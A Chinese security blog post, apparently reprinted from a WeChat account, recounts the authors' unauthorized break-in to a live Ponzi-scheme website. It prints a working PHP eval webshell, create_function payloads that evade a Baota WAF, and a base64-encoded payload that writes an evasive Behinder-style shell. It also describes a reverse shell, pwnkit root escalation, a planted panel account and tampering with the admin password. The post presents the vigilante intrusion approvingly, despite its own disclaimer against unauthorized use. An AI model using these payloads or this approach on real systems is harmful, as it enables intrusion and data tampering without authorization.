一次波折的违法资金盘渗透学习

admin 2023年6月16日17:47:43评论73 views字数 1993阅读6分38秒阅读模式
✎ 阅读须知

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

1. 缘由

技术可能有不太连续的地方,因为时间比较远了,文章可能不完整,将就着看吧。

技术核心还得是小绵羊师傅,膜拜!

大概在2年前的时候,根据消息,对某新开的违法资金盘进行渗透,整个过程一波三折,时间过去这么久了,在这里对整个经过进行脱敏之后和大家分享下。

在某一个诈骗群中,有一个新型的传销资金盘正在筹备中,该项目在某聊天工具群中发布消息进行洗脑:

一次波折的违法资金盘渗透学习
image.png

在这里人家已经说了,就是资金盘,其中有很多人都是带着自己的所谓的下级去赚钱,实际上这些人都是托。

一次波折的违法资金盘渗透学习
image.png

因为群会风控,所以骗子就会要求已经注册的会员到另外一个平台的群组里面去:

一次波折的违法资金盘渗透学习
image.png

2. 渗透过程

2.1 getshell

因为违法盘是当天发的,渗透也是当天做的,通过二维码扫描,发现该站点为一个thinkphp的站点,而且爆出了版本信息:

一次波折的违法资金盘渗透学习
image.png
一次波折的违法资金盘渗透学习
image.png

服务器搭建在香港,并且存在cdn:

一次波折的违法资金盘渗透学习
image.png

通过骗子提供的邀请链接,正常注册之后,进入普通用户后台:

一次波折的违法资金盘渗透学习
image.png

进入后台之后,就展开一系列的信息搜集工作,此时对方站点存在cdn,但是不存在waf,通过一系列鼓捣之后,拿到了shell

一次波折的违法资金盘渗透学习
image.png

拿到shell之后,发现此时是www权限:

一次波折的违法资金盘渗透学习
image.png

至此,getshell算是告一段路,在这里要说的是,当时由于麻痹大意,shellphp的最简单的一句话木马,没有做任何的免杀措施,当时因为很顺利,就去吃饭去了,吃完之后,再鼓捣。

2.2 优势宰我-寄

从下午18:00点发布的盘,基本上18:30拿到了shell,尝试提权失败,然后就稍微休息了一下,吃完饭回来,大概不到19:00的样子,shell连不上了,而且上了强力waf

尝试漏洞利用的时候,发现寄:

一次波折的违法资金盘渗透学习
image.png

但是原来的一句话木马还在,直接访问当时的一句话木马文件,可以访问到,但是当执行命令的时候,对方使用了宝塔,而且还有cdn,只要是访问有异常,直接封禁。

一次波折的违法资金盘渗透学习
image.png

只要是有一条不正确,直接大寄:

一次波折的违法资金盘渗透学习
image.png

2.3 峰回路转

整理下思路:

目前遇到的漏洞利用点被宝塔禁了,但是上面还有一句话木马在,能连是能连,但是执行操作就会寄,虽然存在cdn,但是通过报错,获取到了服务器的真实ip

一次波折的违法资金盘渗透学习
image.png

我滴工作基本就到这了,后面就是小绵羊师傅来操作的:

耗费了很多时间之后,求教了小绵羊师傅,通过师傅一番操作之后,通过php的一句话木马,顺利执行得到了phpinfo信息:

一句话木马:
<?php @eval($_POST[a])?>

小绵羊师傅用下面的一句话获得phpinfo

post:
a=$url="php";$p="info();";$c=$url.$p;$s= create_function('',$c);$s();
一次波折的违法资金盘渗透学习
image.png

再利用phpinput协议,得到了一个新的免杀shell

a=$url="file";$p="_put_contents('a.php',base64_decode('b24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7Cj8%2BCg%3D%3D'));";$c=$url.$p;$s= create_function('',$c);$s();

冰蝎马get:

一次波折的违法资金盘渗透学习
image.png

最后通过命令执行反弹得到了一个shell

一次波折的违法资金盘渗透学习
image.png

但是这个shell好像不太聪明,限制太多,肯定就是宝塔的基操了,在这里运气不错,通过pwnkit提权成功,获取到了root权限:

一次波折的违法资金盘渗透学习
image.png

然后通过宝塔的后渗透操作,到了后台:

一次波折的违法资金盘渗透学习
image.png

在这里默认密码都修改了,最后是新增用户上去的:

一次波折的违法资金盘渗透学习
image.png

2.4 数据部分

资金盘基操:站库分离

后台拿到了源码之后,经过分析,找到了数据库的地址,通过代码临时替换了管理员密码,登录后台成功:

一次波折的违法资金盘渗透学习
image.png

3.总结

在这个里面很多地方都是省略了,其实中间蛮曲折的,骗子是非常专业的,他们的运维也是非常专业的。

他们的站点可能有几十个,专业行骗,专骗老幼和宝妈,非常可恶!

原文始发于微信公众号(乌鸦安全):一次波折的违法资金盘渗透学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月16日17:47:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   一次波折的违法资金盘渗透学习https://cn-sec.com/archives/1813634.html

发表评论

匿名网友 填写信息